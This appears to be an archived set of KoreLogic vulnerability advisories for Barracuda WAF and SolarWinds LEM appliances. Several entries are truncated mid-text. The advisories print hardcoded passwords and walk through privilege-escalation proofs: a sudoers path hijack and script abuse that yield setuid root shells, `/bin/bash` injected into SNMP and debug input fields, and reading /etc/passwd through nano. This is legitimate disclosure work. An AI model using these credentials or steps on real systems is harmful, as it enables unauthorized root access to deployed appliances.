from:"KoreLogic Disclosures"

KL-001-2017-011 : Barracuda WAF Internal Development Credential Disclosure

Title: Barracuda WAF Internal Development Credential Disclosure
Advisory ID: KL-001-2017-011
Publication Date: 2017.07.06
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-011.txt


1. Vulnerability Details

 Affected Vendor: Barracuda
 Affected Product: Web Application Firewall V360
 Affected Version: Firmware v8.0.1.014
 Platform: Embedded Linux
 CWE Classification: CWE-489: Leftover Debug Code, CWE-200: Information 
Exposure
 Impact: Privileged Access
 Attack vector: Code Review

2. Vulnerability Description

 Firmware reversing of the Barracuda Web Application Firewall
 uncovered development artifacts that should have been removed
 on the production images. Once the encryption scheme was broken,
 many QA and development tools were discovered on the affected
 partitions. Some of these contained sensitive information such
 as authentication credentials used by internal developers.

3. Technical Description

 root@(none):/realroot/root# grep -ri "bospw" *|more
 newfile/lib/Stub.pm:'BOSPW'  => undef,
 newfile/lib/Stub.pm:my $bospw = $self->_retrieve_bos_pw();
 newfile/lib/Stub.pm:$self->_set_BOSPW($bospw);
 newfile/lib/Stub.pm:  my $bospw = Postbuild::get_bos_pw();
 newfile/lib/Stub.pm:  my $url =
"https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm;
 platform=$platform=$bdvers";
 newfile/lib/Stub.pm:  $bospw = Postbuild::get_bos_pw();
 newfile/lib/Stub.pm:  $url =
"https://$bospw\@ops.barracudanetworks.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm
 =$platform_country=$ship_code=$bdvers";
 newfile/lib/Stub.pm:my $bospw;
 newfile/lib/Stub.pm:if ( -f "/root/bospw" ) {
 newfile/lib/Stub.pm:open IN, "/root/bospw";
 newfile/lib/Stub.pm:$bospw = ;
 newfile/lib/Stub.pm:chomp($bospw);
 newfile/lib/Stub.pm:$bospw = "manufacturing:N3rfH3rders";
 newfile/lib/Stub.pm:return $bospw;
 newfile/lib/Stub.pm:sub _get_BOSPW() {
 newfile/lib/Stub.pm:   return $self->{'BOSPW'};
 newfile/lib/Stub.pm:sub _set_BOSPW() {
 newfile/lib/Stub.pm:my ($self, $BOSPW) = @_;
 newfile/lib/Stub.pm:$self->{'BOSPW'} = $BOSPW;
 newfile/lib/Postbuild.pm:my $bospw = "manufacturing:N3rfH3rders";
 newfile/lib/Postbuild.pm:if( -f "/root/bospw" ) {
 newfile/lib/Postbuild.pm:open IN, "/root/bospw";
 newfile/lib/Postbuild.pm:$bospw = ;
 newfile/lib/Postbuild.pm:chomp($bospw);
 newfile/lib/Postbuild.pm:return $bospw;
 newfile/lib/Postbuild.pm:my $bospw = get_bos_pw();
 newfile/lib/Postbuild.pm:  my $url =
"https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$vm
 atform=$platform=$bdvers";
 newfile/lib/Postbuild.pm:  $url =
"https://$bospw\@ops.barracuda.com:443/cgi-old/createserialkey.cgi?model=$tmpmodel=$date=$tmpMAC=$tmprevision=$tmphw=$devel=$
 vm=$platform_country=$ship_code=$bdvers";
 newfile/lib/Postbuild.pm:my $bospw = get_bos_pw();
 newfile/lib/Postbuild.pm:my $url =
"https://$bospw\@ops.barracudanetworks.com:443/~order/prod_void.cgi?void_serial=$serial;;
 postbuild-code-platform-2.tar.gz.integrit:!/root/bospw
 qaclear:unlink("/root/bospw");
 qaclear.2:unlink("/root/bospw");
 qapass:my @bospw = ("manufacturing:N3rfH3rders");
 qapass:my $extrabospw = 
injectAndGet("__METHOD__://__POSTBUILDIP__/postbuild/files/os_updates2/root/bospw",
 {
METHOD => [ "http", "https" ], POSTBUILDIP => [ 
"mfg-postbuild.englab.cudanet.local" ] }, 10
  );
 qapass:if( defined($extrabospw) ) {
 qapass:unshift @bospw, split(/\n/, $extrabospw);
 qapass:$url = 
"https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$warehouse=$firmware;
 qapass:$url =  
"https://__BOSPW__\@__BOSIP__/~order/prod_accept.cgi?serial=$serial=$firmware;;
 qapass:if (!defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => 
\@bosip } ))) {
 qapass:$url = 
"https://__BOSPW__\@__BOSIP__/cgi-bin/get_serial_status.cgi?serial=$serial;;
 qapass:my $content = injectAndGet($url, { BOSPW => \@bospw, BOSIP => 
\@bosip } );
 qapass:$url =
"https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;;
 qapass:$url =
"https://__BOSPW__\@__BOSIP__/cgi-bin/shipping.cgi?option=qadocs=1_label=1_code=1_loc=manufacturing=Print_id=$serial=$serial$loc_string;;
 qapass:if( !defined(injectAndGet($url, { BOSPW => \@bospw, BOSIP => 
\@bosip })) ) {
 qapass:$url =

KL-001-2017-015 : Solarwinds LEM Hardcoded Credentials

KL-001-2017-015 : Solarwinds LEM Hardcoded Credentials

Title: Solarwinds LEM Hardcoded Credentials
Advisory ID: KL-001-2017-015
Publication Date: 2017.07.06
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2017-015.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials
Impact: Unintended Access
Attack vector: Local

2. Vulnerability Description

The appliance contains multiple hardcoded passwords and hash
digests.

3. Technical Description

# grep "password" /usr/local/jetty/scripts/certs/openssl.cnf
output_password= QDXTCDD2nJIU

# grep "password" /usr/local/jetty/scripts/certs/openssl.cnf.org
output_password= QDXTCDD2nJIU

# grep "password" /usr/local/contego/scripts/certs/openssl.cnf
output_password= QDXTCDD2nJIU

# grep -i "password" /usr/local/jetty/etc/jetty-ssl.xml
q4ROVdYYsV5M
q4ROVdYYsV5M
q4ROVdYYsV5M

# grep -i "password" /usr/local/contego/scripts/indepth-backup.pl
my $PASSWORD = "omgcontegorox";

# grep -i "password" /usr/local/contego/scripts/database/pgsql/flow.sql
CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme';
CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';

//Empty Password
# grep -i "password"
/usr/local/contego/run/manager/toolconfig/toolstore.script
CREATE USER SA PASSWORD DIGEST 'd41d8cd98f00b204e9800998ecf8427e'

# grep -i "password" /usr/local/contego/run/indepth.conf
InDepthMaintenPassword=tVyf+rPBho7S0WOd/29MPg\=\=
InDepthManagerPassword=zhZi52gTxKbMKTzgdfBtMQ\=\=

// cracks to "welcome" without quotes
# grep -i "password" /usr/local/contego/run/tomcat/conf/tomcat-users.xml

# grep -i "password" /usr/local/contego/run/system.conf
archive.password=omgcontegorox
backup.password=omgcontegorox
logbackup.password=omgcontegorox

# grep -i "password" /usr/local/contego/run/daemon-args.pl
my $tls =
"-Djavax.net.ssl.keyStore=/usr/local/contego/scripts/certs/.keystore
-Djavax.net.ssl.keyStorePassword=q4ROVdYYsV5M
-Djavax.net.ssl.trustStore=/usr/local/contego/scripts/certs/.truststore
-Djavax.net.ssl.trustStorePassword=q4ROVdYYsV5M";

# grep -i "password" /usr/local/contego/run/manager.conf
PSQLPassword=aNErCbdTvwaXxnusqVsNCQ\=\=
ForensicPassword=BosMXyGmaT/ej+S3GU6fRQ\=\=

# grep -i "password" /var/rawdata/cores/solr.conf
query_password=tObzgVmmszuKGZ40W+PO/Q==

//hardcoded md5
# grep -i "password" /var/alertdata/hsql/alertdb.script
CREATE USER SA PASSWORD DIGEST 'fe42a787c40ad4110affab25e8bad4ae'
CREATE USER "trigeo" PASSWORD DIGEST '54837f887425d1eda4d0ddcee6c2d3fc'

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://support.solarwinds.com/Success_Center/Log_Event_Manager_(LEM)/Log_and_Event_Manager_LEM_6-3-1_Hotfix_5_ReadMe

http://downloads.solarwinds.com/solarwinds/Release/HotFix/SolarWinds-LEM-v6.3.1-Hotfix5.zip

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2017.04.06 - KoreLogic submits vulnerability report and PoC to
Solarwinds contact.
2017.05.15 - Solarwinds notifies KoreLogic that a hotfix
addressing this issue will be available at the end
of June.
2017.05.18 - 30 business days have elapsed since this issue was
reported.
2017.06.09 - 45 business days have elapsed since this issue was
reported.
2017.06.29 - Solarwinds releases hotfix.
2017.07.06 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

Our public vulnerability disclosure policy is available at:

KL-001-2017-012 : Barracuda WAF Grub Password Complexity

KL-001-2017-012 : Barracuda WAF Grub Password Complexity

Title: Barracuda WAF Grub Password Complexity
Advisory ID: KL-001-2017-012
Publication Date: 2017.07.06
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2017-012.txt

1. Vulnerability Details

Affected Vendor: Barracuda
Affected Product: Web Application Firewall V360
Affected Version: Firmware v8.0.1.014
Platform: Embedded Linux
CWE Classification: CWE-259: Use of Hard-coded Password
Impact: Privileged Access
Attack vector: Password Cracking

2. Vulnerability Description

The grub password for all V360 virtual appliances is four
characters in length and, as a result, may be trivially easy
to crack.

3. Technical Description

# grep "pbkdf2" grub.cfg
password_pbkdf2 root
grub.pbkdf2.sha512.1.CA568B32B7E1F9A8ADC73224CD8AD1085B23FF5B69558D92E70961F4DEE3F5844CC4E3FC8FC4CBDB0941AC682B52DE64343F6847DF8AD480597B49EA65F48B41.0314A76ADA4989857110B3177617AECF8D38F99E417DCE2B1A289AD5F48C0DFC4969E76E10175399E8978DDE5DFD4B6E7EE808CD00CD6CA43512E92C2EB1D63A
#

This hash cracks to: bimg

4. Mitigation and Remediation Recommendation

The vendor has patched this vulnerability in the lastest
virtual appliance release.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

2016.12.20 - KoreLogic sends vulnerability report and PoC to
Barracuda.
2016.12.21 - Barracuda acknowledges receipt of the vulnerability
report.
2017.01.09 - Barracuda informs KoreLogic that they are working
on remediation for this issue.
2017.01.26 - Barracuda asks for additional time beyond the
standard 45 business day embargo to address this
and other issues reported by KoreLogic.
2017.02.27 - 45 business days have elapsed since the issue was
reported.
2017.04.10 - 75 business days have elapsed since the issue was
reported.
2017.05.15 - 100 business days have elapsed since the issue was
reported.
2017.05.24 - Barracuda updates KoreLogic on the status of the
remediation efforts.
2017.06.13 - 120 business days have elapsed since the issue was
reported.
2017.06.27 - Barracuda informs KoreLogic that the issue has
been fixed in the latest release of the WAF
virtual appliance.
2017.07.06 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

signature.asc
Description: OpenPGP digital signature

KL-001-2017-014 : Barracuda WAF Support Tunnel Hijack

KL-001-2017-014 : Barracuda WAF Support Tunnel Hijack

Title: Barracuda WAF Support Tunnel Hijack
Advisory ID: KL-001-2017-014
Publication Date: 2017.07.06
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-014.txt


1. Vulnerability Details

 Affected Vendor: Barracuda
 Affected Product: Web Application Firewall V360
 Affected Version: Firmware v8.0.1.014
 Platform: Embedded Linux
 CWE Classification: CWE-304: Missing Critical Step In Authentication
 Impact: Remote Access
 Attack vector: DNS, SSH

2. Vulnerability Description

 During the creation of a tunnel connection to barracuda
 support, the code creating the tunnels fails to:
   1) Validate DNS Records,
   2) Validate SSH Host Key, and
   3) Transmit Public SSH Key over an encrypted, verified channel.

3. Technical Description

 file: /usr/local/bin/support-tunnel

 The first host added to the available remote hosts is done through using
 DNS resolution on support01.barracudanetworks.com. If an attacker can 
control DNS,
 it is possible to subvert network traffic by creating records that will 
resolve to
 an attacker's IP address.

   [snip]
   sub remote_hosts() {
   my $central = 'support01.barracudanetworks.com';
   my @hosts;
   my $host = resolv_host($central) || $central;

   push @hosts, {
   'ssh' => { 'host' => $host, 'port' => 22 },
   'web' => { 'host' => $host, 'port' => 80 },
   };

   push @hosts, {
   'ssh' => { 'host' => '64.235.147.77', 'port' => 22 },
   'web' => { 'host' => '64.235.147.77', 'port' => 80 },
   };

   push @hosts, {
   'ssh' => { 'host' => '64.235.154.112', 'port' => 22 },
   'web' => { 'host' => '64.235.154.112', 'port' => 80 },
   };

   return @hosts;
   } # remote_hosts
   [snip]

 The appliance will send a URL-encoded copy of the public key using HTTP.

   sub tunnel_post_key() {
   my $host= shift;
   my $port= shift;
   my $serial  = shift;
   my $pubkey  = shift;

   [snip]

   $url= 
sprintf('/tunnel-broker?serial=%s=%s=%s=%s=%s', $serial,
Digest::MD5::md5_hex($serial), url_escape($pubkey), 
Digest::MD5::md5_hex($pubkey), url_escape(VERSION));

   #
   # Write an HTTP request.
   #
   $req= "GET $url HTTP/1.0\r\nHost: $host\r\n\r\n";

   do {
   $retval = aio_write($sock, $req);
   } while ($retval == AIO_WOULDBLOCK && $stop > time);

   if ($retval != AIO_SUCCESS) {
   throw(SYSTEM_EXCEPTION, "aio_write($addr:$port, $req): 
$!");
   aio_close($sock);
   return undef;
   }

   [snip]

   return 1;
   } # tunnel_post_key

 It should be noted that the appliance is shipped with a default key
 
(pvt_md5:194d9a5167153e1137134e1896d67b47,pub_md5:62c3a6e160cc501f2ffa2d1434176e93)
 but will generate and submit a new key should the default key no longer 
exist.
 This happens in the ssh_key_path function.

 Finally, the appliance specifically sets StrictHostKeyChecking to no.
 This instructs the ssh client to ignore any SSH host-key mismatch and 
allows
 an attacker to more easily leverage their own SSH server for attacks.

   sub ssh_command_args($\;$$) {
   my $sshcmd  = shift;
   my $serialref   = shift;
   my $sshkey  = shift;
   my $sshhost = shift || 'support01.barracudanetworks.com';
   my $sshport = shift || 22;
   my $lsshport= shift || local_ssh_port || 22;
   my $lwebport= shift || local_web_port || 8000;
   my $lsslvpnport = shift;
   if( get_product() eq "bvs" ) {
   $lsslvpnport = local_sslvpn_port || 443 if !$lsslvpnport;
   }
   my @version = ssh_version_of($sshcmd);
   my (@args, $has_unixfwd, $has_exitonfwdfailure, 
$has_defineremotehost);

   $has_unixfwd= ($version[0] > 4 || ($version[0] == 4 
&& $version[1] >= 4));
   $has_exitonfwdfailure   = ($version[0] > 4 || ($version[0] == 4 
&& $version[1] >= 4));
   $has_defineremotehost   = ($version[0] >= 4);

   push @args, '-T';   # Don't allocate 
a TTY
   push @args, '-' . ('v' x want_verbose)  # Passthru 
verbosity
   if want_verbose;
   push @args, '-o', 'StrictHostKeyChecking=no';   # Ignore 
Support01 host key (bad idea?)
   push @args, '-i', $sshkey;

   push @args, '-o',

KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path

KL-001-2017-005 : Solarwinds LEM Privilege Escalation via Controlled Sudo Path

Title: Solarwinds LEM Privilege Escalation via Controlled Sudo Path
Advisory ID: KL-001-2017-005
Publication Date: 2017.04.24
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2017-005.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-281: Improper Preservation of Permissions,
CWE-708: Incorrect Ownership Assignment
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

Due to lax filesystem permissions, an attacker can take control
of a hardcoded sudo path in order to execute commands as a
privileged user.

3. Technical Description

Should an attacker gain access to the SSH console for the
cmc user, root access to the underlying operating system can be
achieved. The default password for the cmc user is "password".

Due to underlying filesystem permissions, it is possible
for the cmc user to assume control of a path hardcoded in
the sudoers file. The attack is started by moving the scripts
directory and creating a symlink to a (now) attacker controlled
scripts directory.

cmc@swi-lem:/usr/local/contego$ mv scripts scripts.real && mkdir scripts
&& cd scripts.real && for A in * ; do ln
-s ../scripts.real/${A} ../scripts/${A} ; done

Next, a file specified in the sudoers file is overwritten and
then executed using sudo.

cmc@swi-lem:/usr/local/contego/scripts$ diff -u hostname.sh
hostname.sh.backdoor
--- hostname.sh 2005-07-01 20:10:17.0 -0700
+++ hostname.sh.backdoor2016-12-11 12:20:35.0 -0800
@@ -1,5 +1,10 @@
#!/bin/sh
+# create a backdoor setuid shell
+cp /bin/dash /tmp/sushi
+chown root:root /tmp/sushi
+chmod 4755 /tmp/sushi
+
[snip]
cmc@swi-lem:/usr/local/contego/scripts$ rm hostname.sh && mv -i
hostname.sh.backdoor hostname.sh
cmc@swi-lem:/usr/local/contego$ sudo /usr/local/contego/scripts/hostname.sh

This results in a suid dash shell being output to /tmp/sushi.

cmc@swi-lem:/usr/local/contego$ ls -ld /tmp/sushi
-rwsr-xr-x 1 root root 104168 Dec 11 12:21 /tmp/sushi

Running this shell results in root privileges.

cmc@swi-lem:/usr/local/contego$ /tmp/sushi
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root)
groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Hank Leininger and Matt
Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

signature.asc
Description: OpenPGP digital signature

KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse

KL-001-2017-006 : Solarwinds LEM Privilege Escalation via Sudo Script Abuse

Title: Solarwinds LEM Privilege Escalation via Sudo Script Abuse
Advisory ID: KL-001-2017-006
Publication Date: 2017.04.24
Publication URL:
https://www.korelogic.com/Resources/Advisories/KL-001-2017-006.txt

1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privileged Access
Attack vector: SSH

2. Vulnerability Description

An attacker can abuse functionality provided by a script which
may be run with root privilege in order to elevate privilege.

3. Technical Description

Should an attacker gain access to the SSH console for the
cmc user, root access to the underlying operating system can be
achieved. The default password for the cmc user is "password".

The cmc account can run certain script files with root privilege.
Listed below:

cmc ALL=(ALL) NOPASSWD:
/usr/local/contego/scripts/activate.pl,
/usr/local/contego/scripts/apply_hotfix,
/usr/local/contego/scripts/cleantemp.pl,
/usr/local/contego/scripts/contego-archive,
/usr/local/contego/scripts/contego-backup,
/usr/local/contego/scripts/contego-logbackup,
/usr/local/contego/scripts/debugdump.pl,
/usr/local/contego/scripts/disable_ipv6.sh,
/usr/local/contego/scripts/exportsyslog.pl,
/usr/local/contego/scripts/hostname.sh,
/usr/local/contego/scripts/ipchains_restore.sh,
/usr/local/contego/scripts/managerReset.pl,
/usr/local/contego/scripts/mountshare.sh,
/usr/local/contego/scripts/mountsolr.pl,
/usr/local/contego/scripts/netconfig.sh,
/usr/local/contego/scripts/opseccontrol.sh,
/usr/local/contego/scripts/rcc.pl,
/usr/local/contego/scripts/setupCert.sh,
/usr/local/contego/scripts/sim2lem.pl,
/usr/local/contego/scripts/snortcontrol.sh,
/usr/local/contego/scripts/sshcontrol.sh,
/usr/local/contego/scripts/swi_login_update.pl,
/usr/local/contego/scripts/timecontrol.sh,
/usr/local/contego/scripts/upgrade.pl,
/usr/local/contego/scripts/upgrade21.sh,
/usr/local/contego/scripts/upgrade_bootloader.sh,
/usr/local/contego/scripts/recovery.py,
/sbin/shutdown,
/usr/bin/lem/lynx-admin-ui

One script, upgrade21.sh allows the user to change ownership and
permission bits for an arbitrary file. This can be abused to
elevate privilege to root.

cmc@swi-lem:/usr/local/contego/scripts$ cp /bin/dash /tmp/koresh
cmc@swi-lem:/usr/local/contego/scripts$ sudo ./upgrade21.sh setperms
/tmp/koresh root root 4755
sudo: unable to resolve host swi-lem
cmc@swi-lem:/usr/local/contego/scripts$ /tmp/koresh
# id
uid=1001(cmc) gid=1000(trigeo) euid=0(root)
groups=0(root),4(adm),24(cdrom),25(floppy),104(postgres),105(snort),1000(trigeo),1002(dbadmin)

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Hank Leininger and Matt
Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

7. Proof of Concept

See 3. Technical Description

Our

KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection

KL-001-2017-007 : Solarwinds LEM Management Shell Escape via Command Injection

Title: Solarwinds LEM Management Shell Escape via Command Injection
Advisory ID: KL-001-2017-007
Publication Date: 2017.04.24
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt


1. Vulnerability Details

 Affected Vendor: Solarwinds
 Affected Product: Log and Event Manager Virtual Appliance
 Affected Version: v6.3.1
 Platform: Embedded Linux
 CWE Classification: CWE-78: Improper Neutralization of Special
 Elements used in an OS Command
 Impact: Privileged Access
 Attack vector: SSH

2. Vulnerability Description

 Insufficient input validation in the management interface can
 be leveraged in order to execute arbitrary commands. This can
 lead to (root) shell access to the underlying operating system.

3. Technical Description

 Should an attacker gain access to the SSH console for the
 cmc user, root access to the underlying operating system can be
 achieved. The default password for the cmc user is "password".

 This report details two distinct attack vectors: the username
 input during SNMP setup and the destination email input
 during debug.

   
   = SNMP =
   

 This is accomplished by placing `/bin/bash` in the username
 input during SNMP server setup.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
   //
   ///   SolarWinds Log & Event Manager   ///
   ///   management console   ///
   //

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]Upgrade, Debug
   [ service ]Restrictions, SSH, Snort
   [ ndepth ] nDepth Configuration/Maintenance
 upgrade  Upgrade this Appliance
 adminRun Admin UI (for better usability browse 
https://1.3.3.7/mvc/configuration)
 import   Import a file that can be used from the Admin UI
 help display this help
 exit Exit
 cmc > service
 Available commands:
 startssh   Start the SSH Service
 stopsshStop the SSH Service
 restartssh Restart the SSH Service
 restrictsshRestrict Access to the SSH Service (by IP 
Address/hostname)
 unrestrictssh  Remove Restrictions on Access to the SSH Service
 snmp   Configure the SNMP Services
 copysnortrules Copy Snort rules to floppy or network share
 loadsnortrules Load Snort rules from floppy or network share
 loadsnortbackupLoad Snort rules from backup
 restartsnort   Restart the Snort Service
 enableflow * Enable the flow Collection Service
 disableflowDisable the flow Collection Service
 restrictconsoleRestrict Access to the Manager Console (GUI) by 
IP/hostname
 unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
 restrictreportsRestrict Access to Reports by IP/hostname
 unrestrictreports  Remove Restrictions on Access to Reports
 stopopsec  Stop all running OPSEC LEA client connections
 help   display this help
 exit   Return to main menu

 NOTE: Commands with an asterisk (*) include an automatic manager 
service restart
 cmc::service > snmp
 SNMP Trap Logging Service is RUNNNING
 Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is RUNNNING
 Would you like to STOP the SNMP Request Service? [Y/n] Y

 The SNMP Trap Logging Service is stopped.
 The SNMP Request Service is stopped.
 cmc::service > snmp
 SNMP Trap Logging Service is DISABLED
 Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is DISABLED
 Would you like to ENABLE the SNMP Request Service? [Y/n] Y

 Enter the port number to access SNMP on LEM (default: 161):
 Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
 Enter the password hashing algorithm (SHA1, MD5 or NO for no 
authentication, default: SHA1):
 Enter the authentication password (default: orion123):
 Enter the communication encryption algorithm (AES128, DES56 or NO for no 
encryption, default: AES128):
 Enter the encryption key (default: orion123):

 cmc@swi-lem:/usr/local/contego$


   
   = Debug=
   

 This is accomplished by placing `/bin/bash` in the destination
 email input during debug.

 $ ssh

KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

KL-001-2017-008 : Solarwinds LEM Management Shell Arbitrary File Read

Title: Solarwinds LEM Management Shell Arbitrary File Read
Advisory ID: KL-001-2017-008
Publication Date: 2017.04.24
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-008.txt


1. Vulnerability Details

 Affected Vendor: Solarwinds
 Affected Product: Log and Event Manager Virtual Appliance
 Affected Version: v6.3.1
 Platform: Embedded Linux
 CWE Classification: CWE-36: Absolute Path Traversal
 Impact: Information Disclosure
 Attack vector: SSH

2. Vulnerability Description

 The management shell allows the end user to edit the MOTD banner
 displayed during SSH logon. The editor provided for this is
 nano. This editor has a keyboard mapped function which lets
 the user import a file from the local file system into the
 editor. An attacker can abuse this to read arbitrary files
 within the allowed permissions.

3. Technical Description

 Should an attacker gain access to the SSH console for the
 cmc user, read access to files on the local filesystem can be
 achieved. The default password for the cmc user is "password".

 This is accomplished by abusing the editor selection for the
 MOTD banner edit functionality.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 11:35:29 2016 from 1.3.3.6
   //
   ///   SolarWinds Log & Event Manager   ///
   ///   management console   ///
   //

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]Upgrade, Debug
   [ service ]Restrictions, SSH, Snort
   [ ndepth ] nDepth Configuration/Maintenance
 upgrade  Upgrade this Appliance
 adminRun Admin UI (for better usability browse 
https://1.3.3.7/mvc/configuration)
 import   Import a file that can be used from the Admin UI
 help display this help
 exit Exit
 cmc > appliance
 Available commands:
 activate   Activate appliance features after licensing.
 checklogs  Check Appliance Logs for Remote Data
 clearsyslogClear Syslog Logs
 cleantemp  * Clean Up Temporary Files
 multimanagerconfig * Enable/disable multimanager
 dateconfig Update Date and Time
 dbdiskconfig   * Configure database retention
 diskusage  Check Disk Usage of your Manager
 diskusageconfigSet Disk Usage Limit of your Manager
 editbanner Edit the SSH login banner.
 exportsyslog   Export System Logs
 hostname   Change the Manager Appliance hostname
 import Import SIM/LEM Backup to LEM
 limitsyslogConfigure the syslog rotation limit (default: 50)
 setlogrotate   Configure the syslog rotation frequency (hourly or 
daily)
 netconfig  Configure Network Parameters (IP Address, Netmask, 
DNS)
 ntpconfig  Update NTP Server Preferences
 password   Change the CMC User Password
 ping   Ping an IP address or hostname
 reboot Reboot the Manager Appliance
 resetsystemmac Reset the MAC address of the Appliance
 shutdown   Shut Down the Manager Appliance
 topView Manager Appliance CPU/Memory Utilization
 tzconfig   Update Time Zone information
 viewnetconfig  View Network Parameters (IP address, netmask, DNS)
 exit   Return to main menu

 NOTE: Commands with an asterisk (*) include an automatic manager 
service restart
 cmc::appliance > editbanner
 Press  to configure the SSH banner.

 Once inside nano, ^R to get the screen below:

 File to insert [from ./] : /etc/passwd
 ^G Get Help
 ^C Cancel

 The result will be:

 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System

KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials

KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials

Title: Solarwinds LEM Database Listener with Hardcoded Credentials
Advisory ID: KL-001-2017-009
Publication Date: 2017.04.24
Publication URL: 
https://www.korelogic.com/Resources/Advisories/KL-001-2017-009.txt


1. Vulnerability Details

 Affected Vendor: Solarwinds
 Affected Product: Log and Event Manager Virtual Appliance
 Affected Version: v6.3.1
 Platform: Embedded Linux
 CWE Classification: CWE-798: Use of Hard-coded Credentials,
 CWE-284: Improper Access Control
 Impact: Remote Database Compromise
